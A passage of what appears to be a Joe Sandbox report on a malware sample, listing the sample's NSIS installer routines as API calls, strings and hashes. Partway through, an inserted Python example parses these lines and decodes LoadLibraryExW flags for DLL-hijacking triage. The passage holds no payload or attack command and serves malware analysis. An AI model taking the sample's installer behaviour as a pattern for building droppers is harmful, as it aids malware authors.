                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405ED3
                                                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400,?,?,00406033,?,?), ref: 00405EDC
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400,?,00000000,?,?,00406033,?,?), ref: 00405EF9
                                                                              • wsprintfA.USER32 ref: 00405F17
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406007
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]
                                                                              • API String ID: 2171350718-461813615
                                                                              • Opcode ID: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                                                              • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                                              • Opcode Fuzzy Hash: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                                                              • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(00437800,7570D4C4,00000000,004035F7,00000006,?,00000006,00000008,0000000A), ref: 00402ED2
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                              Strings
                                                                              • Null, xrefs: 00402FB8
                                                                              • Inst, xrefs: 00402FA6
                                                                              • soft, xrefs: 00402FAF
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                                                              • Error launching installer, xrefs: 00402F11
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 4283519449-527102705
                                                                              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063AF
                                                                              • GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063C2
                                                                              • SHGetSpecialFolderLocation.SHELL32(004052E7,?,00000000), ref: 004063FE
                                                                              • SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 0040640C
                                                                              • CoTaskMemFree.OLE32(?), ref: 00406417
                                                                              • lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                              • lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 00406495
                                                                              Strings
                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406437
                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040637F
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 717251189-730719616
                                                                              • Opcode ID: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                                                              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                              • Opcode Fuzzy Hash: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                                                              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                              • GetSysColor.USER32(00000000,?), ref: 00404281
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                              • SetBkMode.GDI32(?,?), ref: 00404299
                                                                              • GetSysColor.USER32(?), ref: 004042AC
                                                                              • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                              • DeleteObject.GDI32(?), ref: 004042D6
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32 ref: 004047E5
                                                                                • Part of subcall function 00405B1D: lstrlenW.KERNEL32(?,00437800,0040332A,00437800,00437800,00437800,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                                • Part of subcall function 00405B1D: CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                                • Part of subcall function 00405B1D: lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              • lstrcmpiW.KERNEL32(004281A0,?,00000000,?), ref: 00404817
                                                                              • lstrcatW.KERNEL32(?,004281A0,?,00000000,?), ref: 00404823
                                                                              • SetDlgItemTextW.USER32(?,000003FB), ref: 00404835
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Similarity
                                                                              • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                              • String ID:
                                                                              • API String ID: 611778071-0
                                                                              • Opcode ID: f2e89f331acf436d66dc7b8e110d833f00676b1d4688132a04e050de87f1bf3a
                                                                              • Instruction ID: 0d4a6a07d32540202bd103048eaebc2e62f3dbef9356839362eadbdc3d2543bd
                                                                              • Opcode Fuzzy Hash: f2e89f331acf436d66dc7b8e110d833f00676b1d4688132a04e050de87f1bf3a
                                                                              • Instruction Fuzzy Hash: 6A5191F1A00209ABDB11AFA5CD45AAF76B8EF84315F10847BF601B62D1D73C9A418B6D
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                              • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                                                              • SetWindowTextW.USER32(004226C8,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2531174081-0
                                                                              • Opcode ID: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                                                              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                              • Opcode Fuzzy Hash: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                                                              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                                              • GetMessagePos.USER32 ref: 00404B9D
                                                                              • ScreenToClient.USER32(?,?), ref: 00404BB7
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                              • MulDiv.KERNEL32 ref: 00402E20
                                                                              • wsprintfW.USER32 ref: 00402E30
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402E2A
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                                              • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                              • wsprintfW.USER32 ref: 00406608
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
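The API lines in these function entries have one fixed shape (Api.MODULE(arg,...), ref: address, optionally prefixed with "Part of subcall function"), which makes them easy to pull out of a saved report for triage. The following Python is an added example and not part of the Joe Sandbox report or its tooling: it parses such lines into records and decodes the dwFlags argument of LoadLibraryExW. The sample input is copied from the GetSystemDirectoryW / wsprintfW / LoadLibraryExW entry directly above; the record and function names are this example's own, and the flag table is the documented set of Win32 LoadLibraryEx flags.

```python
"""Parse the "APIs" lines of a Joe Sandbox function entry into records.

Added example, not part of the report. The sample lines are copied from the
entry above that builds "%s%S.dll" from GetSystemDirectoryW and then calls
LoadLibraryExW; the names and the flag table are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the three API lines of one entry, as printed.
SAMPLE_ENTRY = """\
• GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
• wsprintfW.USER32 ref: 00406608
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
"""

# One API line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# Api.MODULE, an optional argument list, then the call-site address after "ref:".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# dwFlags bits of LoadLibraryExW (Win32 constants).
LOAD_LIBRARY_FLAGS: Dict[int, str] = {
    0x1: "DONT_RESOLVE_DLL_REFERENCES",
    0x2: "LOAD_LIBRARY_AS_DATAFILE",
    0x8: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                 # raw tokens; "?" is an argument the report shows unresolved
    ref: int                        # call-site address
    subcall: Optional[int] = None   # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn every API line in `text` into an ApiCall; other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs", "Strings", "Memory Dump Source"
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16),
                             int(sub, 16) if sub else None))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every set bit of `value` found in `table`; unknown bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def library_loads(calls: List[ApiCall]) -> List[Tuple[int, List[str]]]:
    """(call site, decoded dwFlags) for each LoadLibraryExW whose flags are shown."""
    out = []
    for c in calls:
        if c.api == "LoadLibraryExW" and len(c.args) >= 3 and c.args[2] != "?":
            out.append((c.ref, decode_flags(int(c.args[2], 16), LOAD_LIBRARY_FLAGS)))
    return out


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_ENTRY)
    for call in parsed:
        print(f"{call.ref:08X} {call.module}!{call.api}{call.args}")
    for ref, flags in library_loads(parsed):
        print(f"LoadLibraryExW at {ref:08X}: dwFlags = {flags}")
```

For the entry above this resolves dwFlags 0x8 to LOAD_WITH_ALTERED_SEARCH_PATH; read together with the preceding GetSystemDirectoryW and the "%s%S.dll" format, the load is anchored to a path under the system directory rather than to a bare module name, which is what you want to confirm when deciding whether a LoadLibraryExW call in a dump is hijackable.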
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                              • CloseHandle.KERNEL32(?), ref: 0040297B
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                                                              • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                                              • Opcode Fuzzy Hash: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                                                              • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 0040315B
                                                                              • GetTickCount.KERNEL32(0040CEA0,00004000), ref: 004031DC
                                                                              • MulDiv.KERNEL32 ref: 00403209
                                                                              • wsprintfW.USER32 ref: 0040321C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                                                              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                              • Opcode Fuzzy Hash: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                                                              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404B0D
                                                                              • wsprintfW.USER32 ref: 00404B16
                                                                              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s$6B
                                                                              • API String ID: 3540041739-3884863406
                                                                              • Opcode ID: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                                                              • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                                              • Opcode Fuzzy Hash: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                                                              • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: *?|<>/":
                                                                              • API String ID: 589700163-165019052
                                                                              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                                              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
